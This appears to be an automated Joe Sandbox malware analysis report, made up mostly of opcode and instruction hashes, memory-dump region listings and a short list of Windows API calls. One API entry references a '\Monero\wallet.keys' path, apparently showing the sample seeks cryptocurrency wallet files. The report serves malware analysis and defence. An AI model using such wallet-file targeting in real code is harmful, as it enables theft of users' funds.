                                      • Instruction Fuzzy Hash: 23020071A093058FCB14CF29C880269B7EAAFA5350F19C72EEC999B352D731E895CB41
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                      • Instruction ID: 6d6e985ae4525813986efd0040bbb6d97cf72afd40aac64baf3b06ab94006d4a
                                      • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                      • Instruction Fuzzy Hash: 14F17AA220C6914BC71D9A1494F08BD7FD25BA9201F4E86ADFDD70F383DA24DA05DBA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                      • Instruction ID: f4695fe204e48f0e43736708fc457c36315362a291bcf201df4f1ca99897dc8b
                                      • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                      • Instruction Fuzzy Hash: D1D16673F106254BEB08CA99DDD13ADB6E2EBD8350F1A423ED916F7381D6B89D018790
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                      • Instruction ID: e59b9b348df2b25f6c416a9b592b947f8097dc297c42b7dced128f9548223944
                                      • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                      • Instruction Fuzzy Hash: 27D1F372E0061D8BDF659F98C8847EEB7B2BF49310F148229E925B7291D7345A4ACF50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                      • Instruction ID: 42c527173e132e26685fbf5e11dc58c0cfd9294239f1e2119a5f398fa65bd412
                                      • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                      • Instruction Fuzzy Hash: 2E028B74E046588FCF16CFA8C4905EDBBB6FF8D310F558159E889AB355C730AAA1CB50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                      • Instruction ID: 29f0cb939cef3ac8cdbae2ea4f57da71a2f1e2d5e69fd3a14527f1af8dab6171
                                      • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                      • Instruction Fuzzy Hash: 53021475E00619CFCF15CF98C8809ADB7B6FF88350F258169E849AB355D731AAA1CF90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                      • Instruction ID: e429f86c2250d60096b3949f1f4d79f91b3415b5d4177f07b4a0ea2d469d8bad
                                      • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                      • Instruction Fuzzy Hash: 94C15A76E29B824BE713973DD802265F395AFE7290F55D72FFCE472942EB2096818304
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      • Opcode ID: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                      • Instruction ID: 8caff6952e3d0c1712b313128e4feb70bbf9f88bc77b5788409b414fd2cc7e14
                                      • Opcode Fuzzy Hash: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                      • Instruction Fuzzy Hash: 8FB12736D852999FDF26CBA4C4983FDBFB2AF56300F19C19AD4486B282DB344D85C790
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                      • Instruction ID: 61e0ef8126379f7dd6128d9b1b0c7f6b6611da0d2886a60af4972d0d0a5b5407
                                      • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                      • Instruction Fuzzy Hash: FDD15770604B40CFD725CF29C494B6BB7F0BB99300F54892ED89A8BB51DB35E945CB91
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      • Opcode ID: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                      • Instruction ID: 329f575b575539dca1ffbc3b6003f5b82cc66d44bf822cbd5adaf8f04cb64a9d
                                      • Opcode Fuzzy Hash: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                      • Instruction Fuzzy Hash: B9D14AB460C3908FD7148F15D4A432BBFE0AF95708F19899EF4D90B391C3BA8959DB92
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                      • Instruction ID: befbe10c413feadbcf0d715a7f4511d35d0decbd691f3ba2139970c2aa99030c
                                      • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                      • Instruction Fuzzy Hash: A7B1B272A083519BD308CF25C49135BF7E2EFC8314F1AC93EF8A99B290D774D9459A82
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                      • Instruction ID: 5b48a213bf7003203a8bc1a93435db18e2dbb024d620a4f2e3d13adaa345c5fd
                                      • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                      • Instruction Fuzzy Hash: 04B19172A083115BD308CF25C89176BF7E2EFC8310F5AC93EF89997291D778D9459A82
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                      • Instruction ID: 0088e81a4c23e755295911292282168e90b41d72cdfd68dc88eb7c0c280ae4b3
                                      • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                      • Instruction Fuzzy Hash: D2B12771A097118FD706EE3DC491229F7E1AFE6280F51C72EF895B7662EB31E8818740
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                      • Instruction ID: 9355ba3a13e7c67925e6d1e226fea5ac1e10081b1be9fa13ad6eb45376eb8f4f
                                      • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                      • Instruction Fuzzy Hash: FC91D571A002118FDF16EE68DC80BBAB3A5AF55300F694565ED18AB382D372DF05CFA1
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                      • Instruction ID: 8463c7a1652af0ae9f365fbfc80706bec896da0b62969c346b69c2fc33702e58
                                      • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                      • Instruction Fuzzy Hash: F1B11B316106099FDB19CF2CC48AB657BE1FF45368F29865CE899CF2A2C735E991CB40
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                      • Instruction ID: dffa3804479977a2339f48adfe8dca6a9b2ef74b4a9abd78ee1762ba0b6f14a8
                                      • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                      • Instruction Fuzzy Hash: 75C14A75A0471A8FC715DF28C08045AB3F2FF88350F258A6DE8999B721D731E9A6CF81
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                      • Instruction ID: 4edda262da39831b1644ea09ceb900c1432388b6ce0be0acfe7d58e44ca5a46b
                                      • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                      • Instruction Fuzzy Hash: A69157319287946AEB168B38DC427BAB7B4FFE6350F14C31AF98C72491FB7185818345
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                       Joe Sandbox IDA Plugin
                                       • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                       Similarity
                                       • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                       • Instruction ID: ea9028abda254a808afcc2cb0bf5f50786ed2b64f94516164929dfc17713df4a
                                       • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                       • Instruction Fuzzy Hash: D3A12E72A10B19CBEB19CF55DCC1A9ABBB1FB54314F24C62AD41AE76A0D334AA44CF50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                       Joe Sandbox IDA Plugin
                                       • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                       Similarity
                                       • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                       • Instruction ID: eb82a986780ddfdc2f6353ff718850e137df4ede2e6968527cb8fe4182400b0e
                                       • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                       • Instruction Fuzzy Hash: 1DA17072E083119BD308CF25C89075BF7E2EFC8714F1AC93DA8A99B254D774E8449B82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                       Joe Sandbox IDA Plugin
                                       • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                       Similarity
                                       • Opcode ID: 07cb1c1adb8716050454af550095c5405281e5ea346c0dbec99f7d0889cd503a
                                       • Instruction ID: e23c1fe6126b96dafc17667b0b5d85560cf7ddaf06ad89cd8721f366be3a5ad7
                                       • Opcode Fuzzy Hash: 07cb1c1adb8716050454af550095c5405281e5ea346c0dbec99f7d0889cd503a
                                       • Instruction Fuzzy Hash: D54106F36186095FE300EE3EDD4476AB7DBEBC0711F2AC93D9A84C3B48E93985064656
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                       Joe Sandbox IDA Plugin
                                       • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                       Similarity
                                       • Opcode ID: 998db67b5cf3e8c0ce796af800ec687be72b8c99d3b03424e71d4901ef10ae68
                                       • Instruction ID: 2b898fa75a73a42cca04e3c131f175f894754c6843bb2c8d0b068c4587fbd0e3
                                       • Opcode Fuzzy Hash: 998db67b5cf3e8c0ce796af800ec687be72b8c99d3b03424e71d4901ef10ae68
                                       • Instruction Fuzzy Hash: E541BEB220C700DFD3057E29D88573AB7E6EF94310F264A2ED6C687684D63558429BA7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                       Joe Sandbox IDA Plugin
                                       • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                       Similarity
                                       • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                       • Instruction ID: d7c46782092b2a627e13d44fc11cb95ed778ed55641aa2ecf7bfaee58cff35c0
                                       • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                       • Instruction Fuzzy Hash: 83512962E09BD589C7058B7544502EEBFB21FE6214F1E829EC4981B383C3759789D3E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                       Joe Sandbox IDA Plugin
                                       • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                       Similarity
                                       • Opcode ID: f040842663a0fef4b0a88de99f4633729b31a50248819a13156378e9c6cf4492
                                       • Instruction ID: 1cfefe6f4e10d65e56e450ce9df247348dd89aca3fde893e803e79afbab2365f
                                       • Opcode Fuzzy Hash: f040842663a0fef4b0a88de99f4633729b31a50248819a13156378e9c6cf4492
                                       • Instruction Fuzzy Hash: 6F31F2B250C700DFD305AF29D88167EFBF5EFA8710F16482DD2D582650EA305884CB57
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                       Joe Sandbox IDA Plugin
                                       • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                       Similarity
                                       • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                       • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                       • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                       • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                       Joe Sandbox IDA Plugin
                                       • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                       Similarity
                                       • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                       • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                       • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                       • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 00128F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00128F9B
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
